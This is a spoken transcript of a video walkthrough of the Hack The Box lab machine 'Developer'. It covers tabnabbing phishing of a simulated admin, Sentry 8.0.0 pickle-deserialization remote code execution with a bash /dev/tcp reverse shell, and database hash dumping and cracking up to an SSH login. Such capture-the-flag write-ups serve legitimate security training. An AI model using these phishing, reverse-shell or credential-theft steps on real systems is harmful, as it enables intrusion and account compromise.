Hey guys, welcome back. Hope you all are doing well. This is Mohammad Badruddin and today we are going to solve another machine from Hackthebox. Machine name is developer and the difficulty level of this machine is hard, and that is really very good machine, and it actually you will feel that you are doing pen testing on the real scenario, and you will learn something new hopefully. So that's being said, let's jump to the machine without wasting time. So we will start from the nmap scan, and we will say nmap space hyphen s capital V space hyphen s capital C and space 10.10.11.103. This is the IP address of the developer machine, and I want to save the scan result on file in file default.nmap because I already ran the scan, so I just want to show you the result default.nmap. So as you can see here, two ports are open, port number 22 and port number 80, which I already keep in my notes. So without wasting time, let's go and see what's running on port number 80. I already made a record in etc host file so that you can call it from the domain name like developer.hackthebox, and there is one application running that is an exclusively free capture the flag platform. So it is something like Hackthebox, where you have the machines to exploit and the challenges to capture the flag CTF are there. So I already go to the page source, but there is nothing interesting in the page source. So but in the website you will see one thing, that you can create your own account. So we can do our own account, and before doing this it's better to have something running in the background. So I'm going to make a directory enumeration with gobuster /user share word list and dbuster, and I'm going to use directory 2.3 and medium with space hyphen u switch. That is going to be the target URL. So developer.hackthebox/ we can also specify the number of threads, but it's okay. So come here and create a user. Let's say Badr. Email address is badr at developer.hackthebox, and let's say the password is badr123456 and badr123456. Agree terms and condition and sign up. So you must type the same password each time. What happened with that? So BADER at 1234, BADER at 1234. Agree terms and condition. Yeah, this time we logged in. So as we logged in the application, we will see a bunch of things. A few dead URLs like Linux, Windows, Intermediate, Linux, Windows, these are dead. And once we go to the challenges and web challenges, there is nothing. In the forensic challenges, we found some challenges. Same like in pawn and reversing, there are challenges. So once I did that machine, I think maybe we have to solve all these challenges and we will get the flags here, or maybe a way to get a foothold. But later I realized that one challenge to solving one challenge is enough to go for the further process. But all these challenges are good. You can attempt and try this. So I'm going to start with this. So someone said there are passwords contained in the document, but I can't find them. Can you? So once you click it, you will find it will download a zip file that named is fished_list. So we can extract it here. After extracting that file, you will find that you will get a Excel file. So we can open this Excel file on the Windows machine. So xfreerdp /u for the username. So the username is admin. /p for the password, and the password is 123456 of my machine, and /v for the IP address. So this is the IP address of my machine. We can also specify 3389 default RDP port for Windows. Hit enter, and the machine is open, and this is the file. So I'm just going to double click it. So as you can see here, there are a bunch of things like ID, first name, last name, email address, recovery, but the interesting thing is A, B, C, D, then there is no E and F, but in between D and F there is E, which you cannot see that way. So to solve this challenge, just choose these two columns and make Ctrl+C, copy, open another Excel sheet and just paste it here. So once you paste it here, you will see A and C column, but in between now, once you double click on it, you will see B is there and you have all the passwords. So go down, and that seems a flag. And with that flag, the important information for us is admin@developer.hackthebox. So it may be a legit user, but for now, I just need this flag. So copy this and come back here, submit flag, and paste it here. Hit enter, and as you can see, the flag is submitted. So if we refresh the page, and you can see the challenge is solved. And once we click again, this time the interesting thing is submit a walkthrough. So click on it, and this is very, very interesting. So you can read it. Your walkthrough will be on your profile page and public profile page. Admin will check the walkthrough as soon as they can and reserve the right to delete them where necessary. So it means there is someone behind who will check whatever URL or whatever walkthrough you will provide them. And one more interesting part is that the write-up you can submit in URL. So that makes me think to go for the SSRF, CSRF vulnerability maybe exist. There is one unintended way you can exploit that with the CSRF and cross. But we will follow the intended way here. So to just confirm whether someone is checking our write-up or not, so http.server, hit enter on port number 8000, come here, http://10.10.14.80, this is my IP, 8000/AAAA, although this AAAA file does not exist, but once someone click on that link what we just submit, we will get a hit here. Another thing is we do not need this at all now, so clear this. We are waiting for the hit on this HTTP server. Till then we can see what we have in the GoBuster result. So from my experience, what I see here, that these all we already find in the page source, but this admin is interesting. And another interesting part is in this dictionary, in this file, any word containing admin, it is gonna say that this is present in your web application directory. And that seems like there is application like Django is running. So in Django case, I found many times that this kind of results we found. So we will see, confirm it a bit later, but here we can see that someone click our write-up link and we found here the hit. It means whatever they say they are doing. Now for this application, I'm going to close this. For this application, actually we are going to create a phishing attack scenario where we send a write-up link, and once the admin will click on that link, it is going to open a new tab on the victim side, and that new tab containing a login page, same like this application login page. So the user will think, okay, my session is timed out and I have to log in. So once that user pass the username and password, we will get the username and password in our Python HTTP server. So you can actually, that phishing attack is known as Tabnabbing, and you can, there are a lot of resources here about the tabnabbing. So you can say tabnabbing is a computer exploit and phishing attack which pursues user to submit their login details and password to popular websites by impersonating the user. And you can go to this OWASP link where you will find a good description about this type of attack as I explained. So we will make a HTML file with the window.opener, and we will offer or serve the victim the login page, phishing login page. Also, if you write here tabnabbing POC, you will find HackerOne, and there they also describe in a very well manner. So if I come here, you will see here as example, this is the vulnerable page and this is the malicious page. So once we send this, the victim user will click on this link and automatically the new tab will be open containing the vulnerable page, but that page is the phishing page or phished page. So once the user will enter username and password, we will capture that request. Coming on the hackers one, you can see this is the file which we need to serve to the victim. So I'm just going to copy this, open a new page here, paste this. In our case, the thing is something different, so I'm going to change it //10.10.14.80 and colon 8000 slash accounts.login.html. Okay, and same link we will offer here, paste. So because what we see before here, if we make log out, sign out, so you can see the login URL is accounts/login. So we will provide them the same thing. Okay, so index.html, we save this file and we will serve this file as write-up. You can name it as you want. Okay, next thing, we need to create a phishing page which seems same like this page. So view page source, this is the best way to create the phishing page from the genuine website, because the page should seems legit. So here I'm going to say login.html, enter. One more thing I want to mention here, that actually we don't have the image folder, and inside image folder we don't have favicon.icon file. Also, we do not have these CSS and JavaScript file, but these files exist on the genuine website. So why not to, because if you do not load these files, then the page will not look good as the genuine website offers. So I'm going to take all these from the legit website. So developer.hackthebox, and I'm going to copy this, and wherever we find JS file or CSS file, I will copy that, paste slash, paste here also, paste here. This I leave, I will come on this in a minute. First of all, just okay, paste and paste and paste, save it. Now this is gonna be the attacker this action is going to be on the attacker server, controlled server, so 10.10.14.80, and port number is going to be 80, account/login.html, and I actually want to choose the method get. Why? Because normally once you run the Python server, whenever any hit comes, so for the get request it is going to capture, but the post request it is not going to capture. Although on the GitHub and on Google you will find many scripts for the Python HTTP server with which you can capture the post request also, but here we will use the simple Python server. Come on here. So Python 3 space -m http.server and port number 80. If you are not logged in as use, you need to put here sudo. So these two servers are running and everything is set up here. Seems good. Close this and close this also. One more thing we need to do here, we need to create a folder here named as accounts, and inside that folder we need to put this login.html because we are calling from this folder. Right, now let's go and log in again. So the username is brother, password is bader@123, hit enter. What was that? bader, what was the password? bader@1234. Yeah, this is the password, thank God. So go back to the forensic and come here, submit here the write-up. So http://10.10.14.80 and from the 8000 port number /index.html. That's it. Hit enter. Come back here and we will wait for the admin to check our write-up. Fine. Till then we can check this also. So come here. We don't need this. http://developer.hackthebox/admin, and you can see we got the Django administrator panel. Even though, why actually GoBuster give that result? Because in this case Django administration portal, even if you do not put the /admin or anything that is containing admin, http:// hit enter, every time it will send you to this Django page. Okay, now come here, nothing. Okay, let's just refresh this. Oh, come on, this is not 18, it's 80. So that is the problem, and I think this time we will get the hit. So we have now the administrator panel, but we do not have password. And what we found from the Excel file, that there is a user named as admin, but we will see in a minute. So come back here, refresh it again, not this, and yeah, we got the hit. So index.html, and it also got login.html. Accounts, oh come on, we made another mistake, we put dot not slash. So where index.html, open with mousepad, come here, yeah, we made a mistake here, slash and slash, save it. Come on, come here again, submit this, refresh the page again. Let's see, this time we should get it. And yeah, so as you can see, we got this request copy, and I'm going to paste it here. So from this request, we know that username is admin and the password is, so username is admin and the password is super secure password and URL encoded value, and that value is actually at the rate. So save it, and I'm going to copy the password, come back here and go to the Django. So username is admin, password is super secure password at the rate Hackthebox 2021, and we logged in the Django administration. The important part here is the username. So we logged in as admin, but the username here is Jacob. So that makes me think maybe we will use this letter, so Jacob. And if we go to the sites here, you will see we got another subdomain, that is valid subdomain. Although once I solved this machine, or I was enumerating that machine, I also enumerate for the subdomains, but I did not get anything because this developer-sentry is not in my word list. So I'm just going to copy this, and now I don't need this, I don't need this. So clear and clear and clear. So if I say, because I already made that entry, so etc/hosts, so you can see I already created that developer-sentry.developer.hackthebox. So now if we go here, http://developer-sentry.developer.hackthebox, hit enter, and we will find another application running on this. So to log in this application, I search for the Sentry default credentials. I try that and some common combinations of passwords, username passwords, but nothing worked. But what we found here, the username, also I tried this one, but that also did not work. Then I try this. So as you can see here, username or email. So if I go to jacob@developer.hackthebox, and the password is super secure password, and login. So we logged in this application Sentry. The important thing here that we have the version Sentry 8.0.0, so we can go and check about this version, any vulnerability. So Sentry 8.0.0 vulnerabilities, hit enter, and we will find bunch of these. So, and in the exploit DB we found one remote code execution vulnerability. So let's open these. These are the list of vulnerability, but do not need that. Also, once you go to the exploit DB, you will find that okay, you need a user, which we already have, so we can run this exploit. But the problem is the parameter here is different from what we need to put. But the most important and interesting thing is there, that we know now that in which feature actually the vulnerability exists. So the application actually contains a audit log entry feature where we can add new audit log entry, and that function is vulnerable to remote code execution. But this is by default is not going to work. You need to change a lot of things. But if you go this document, authenticated remote code execution in Sentry, you go down and you will find actually the point or the piece of code where the vulnerability exists. So, and as you can see that it actually uses the pickle module. Fine. So you can see this. Fine. So, and you can see like the default subdomain name, and after that you need to visit admin Sentry audit log. So if I go here, http:// and developer -sentry/admin, hit enter. Let's say Sentry. Oh, come on. Sentry, and we need to put http:// hit enter. Still not logged in. Audit log entry. Come on. Audit log entry, and we need to put http:// page not found. Okay, just come to this admin Sentry audit log entry, or come here, go down, admin Sentry, take this, copy, come here, paste, and http:// and yeah. So again, as you can see, this is also Django administration portal, but this is very different from this. Fine, because this portal for this and this portal is for this. And one more thing is important, that we are actually logged into this portal because you logged into this web application. If you do not logged in this application, so you will got the authentication page here, and first you have to authenticate yourself with the same username and password, like jacob@developer.hackthebox, and the password is gonna be same. So anyway, we are here now. We can add a new entry from this. Fine. So in the data section, you can put the payload here, IP, you can put your IP, and organization is gonna be 1. So we will see that in a minute, but before that, let's go again to this, and once you go down, you can see the same page you have. So there is proof of concept, and in that proof of concept there is Python code or Python script with which you can actually generate the payload. So I'm going to copy this to save the time and paste it here. It is messed up, but you can work with it. So from cpickle, import dumps, import subprocess, then from base64 import base64 in code, then from zlib import compress to actually compress it, and from shellx import is split. Then there is a class, and the class name is pickle exploit 1 2 3 4, and 1 2 3 4, then, and this is another function, so it should be here, and 1 2 3 4, and then return up to here, then print. And in print it is actually calling the class, so we need to put it here. So save it as sentry.py. okay, and we need to change the payload. So the payload is gonna be /bin/bash space -c, and then /bin/bash space -i greater than, and then /dev/tcp/attacker IP is gonna be this, /port number 4545, and 0 greater than and 1. So this is gonna be the payload. Save it, and let's come here. And one more thing I want to mention here, that cpickle module is not for the Python 3. This module comes in the Python or Python 2.7 up to Python 2.7. So I'm going to run this script actually with Python 2.7. So Python 2.7 and sentry.py. Self arg 8, line number 8. What's the problem on line number 8? Okay, this 4 by 5, I don't know what is it, but this should not be here. So I'll just clear this and run it one more time, and you can see it generated the payload. So the thing is, this payload is base 64 encoded, compressed, dumped, and using the pickle. Fine. So copy this payload and go back to the Django administration page. Here organization is 1. Attacker, you can put Jacob at developer.hackthebox. Actor, I don't know. Actor key, we don't have anything. Target, just put anything, let's say 11. Target user, we don't know. And event, so let's say project create. IP address is going to be my IP address, and the data we put the payload and make it today, make it now, and before saving that, just nc space hyphen nlvp, and we need the reversal on port 4545. So start the listener and just simply save it. Once it's saved here, you will go back and you will see you got the reversal. So who am I, ID, and the host name. So very well. Now just make it a bit smaller. So clear, it will not work. So I'm gonna say export term is equal to xterm, clear, and it's okay. The first thing, I go with the net state space hyphen tlpn, because the Django sites are there and data you are saving and receiving. So as you can see here, the PostgreSQL is running, because if you go here and say Postgres server default port, so 5432, and once you come here you will find 5432, means PostgreSQL is running here. So my next step is to find out two things are there. The first thing is Django application, and another thing is a Sentry application, and the third thing is PostgreSQL is running. So in my previous videos I already show the directory structure of the Django. So in the Django application there are few default files like init.py and settings.py and a web server gateway interface wsgi file.py files are there. These all the files are interesting. So the first thing is I am going to try to get the database connection strings. So if I go to the home directory of www.data ls space -la, we find developer.ctf is there. So just copy it and cd, paste it here, ls space -la, and another developer_ctf directory is there. So again I am going inside of this, clear, and ls space -la. So you can see these files are here. So these all files are interesting to me, but I know that in settings.py there is a connection string. So in any application, normally you will find, if you find this file and database connectivity is there with the application, so you will find connection string here. So cat settings.py, hit enter, up, and I need this. So I'm gonna just copy this, go back here, developer, paste, and let's go and access the PostgreSQL. So PSQL and space -h is gonna be the local host, space -d for the database. So the database name is platform. Copy this, paste it here. Space -U for the username. So ctfadmin, paste it here, and space -W for the password, and the password is ctfog2021, and paste it here. Hit enter and paste the password again. Okay, so we are in. To list actually the database, there is /l. So you can see there are many database platform, and there is one more database, Sentry. This is default, and this is, I don't know what it is, but Sentry and platform, these two databases are interesting. I want to see the tables, so dt, and you can see inside the platform database you have these all the tables, although I am interested in auth group. So the query syntax is same. Select start from auth_user. We found many users. Oh my god. Let's run it one more time. Yeah, that is a bit better. So as you can see, Clubby, Williams, and these all the users are here. And these are the hashed password. So, oh come on, I lost the shell. Netcat 4545, but no need to be worried because we already have this. So copy it again, go back to the Django. This was created by us. Come here, paste the payload again, save it, and we have the. So if I show you something like cat/etc/passwd grep/bin/bash, so you will see we have these users who can run bin bash. So user is Carl, Mark, so but we do not find Carl hash password or Mark user here. So let's go and try to find out for the Sentry. When I did that, you already go to the Django file structure or directory structure. Now it's time to see the file structure of Sentry application. This application basically used for the monitoring purpose. You can read about it in the docs. There is doc. Yeah, this is the doc. So you can read about it. Also, you can Google about it and Google about its directory structure for the Linux. So once you find the directory structure, you will see that it will create a file inside cd/etc. Oh, come on, we are outside of it. So again, do this, copy this, come here. This was our, paste that, save it. We got it here. Export term is equal to xterm clear. So if you go inside cd/etc/Sentry, so it created a file in Sentry, and inside this directory you will find the Sentry configuration file. So if you cat this file, you will find here another database connection string for the Sentry database. So I'm going to copy this again, come here and put that. So let's go and use this. So the database name is Sentry, username is Sentry, and just interesting is the password. So take this and clear again. PSQL, actually exit that and exit that. So PSQL space -h localhost space -d for the database name, that is Sentry, space -U, that is again Sentry username, capital W for the password, and this is the password. Paste again. We are in /l these are the database, but the interesting part is what are the tables there. So you can see it contains a lot of table, more than the platform database, and it also contains auth user table. So again, select star from auth underscore user, and this time well done, we got the Carl user hash. So just take this hash. I'm going to copy this, come here, new, paste it here. I don't need this, I don't need this. Just save it as hash. Now I need to go to hashcat wiki to show you the ID for that. So examples for hash, it will give you the list of all the hashes example. Just find the string, and I want to find this string, copy, paste here, and as you can see there are two matches. One is the first one, we got it, Django, so its ID is 10,000. Fine, so I'm going back here, close this, we already have whatever we need. So hashcat space hyphen a 0 space hyphen m 10,000 and hash slash user share word list and rockyou.txt. Yeah, because I already cracked this hash before from the same directory path, so it already has in the cache, so we just need to show it. And once you do this, it will not take much time. So just delete up to here and hash hyphen hyphen show, and as you can see we have the password. So I'm going to copy this, come here, save, paste. So username is Carl and hash is that, and we have password is this. So we have everything. Let's go and try to SSH from this user Carl. So clear SSH Carl at developer.hackthebox, hit enter, and just copy this and paste it here, enter, and yeah, we are logged in as Carl user. Who am I? ID and host name. Okay, ls space hyphen la. So we have user.txt. You can cat this. That's it for the video. But before going to that, actually I'm going to create this video in two parts. In the another part we will escalate our privileges to root. But before going or before bind up this video, I just want to show you what we need to do. So if you make sudo -l and you paste this password, copy and paste it here, hit enter, you will see this is the file which Carl user can run as root with the sudo. And if you want to see the permission for this, so just paste that, hit enter, you can see we have the read and execute permission. And if you wanna know more about this file, so with the file you will know that this is 64-bit ELF binary which can be run by the Carl user. So let's try to run this to see what is inside that. So sudo and paste this, hit enter. It is asking for the password. Whatever password we put, it said you entered wrong password. So we will actually solve this in the next video. So for record, I just keep it with me, save it, and see you in the next video. Bye.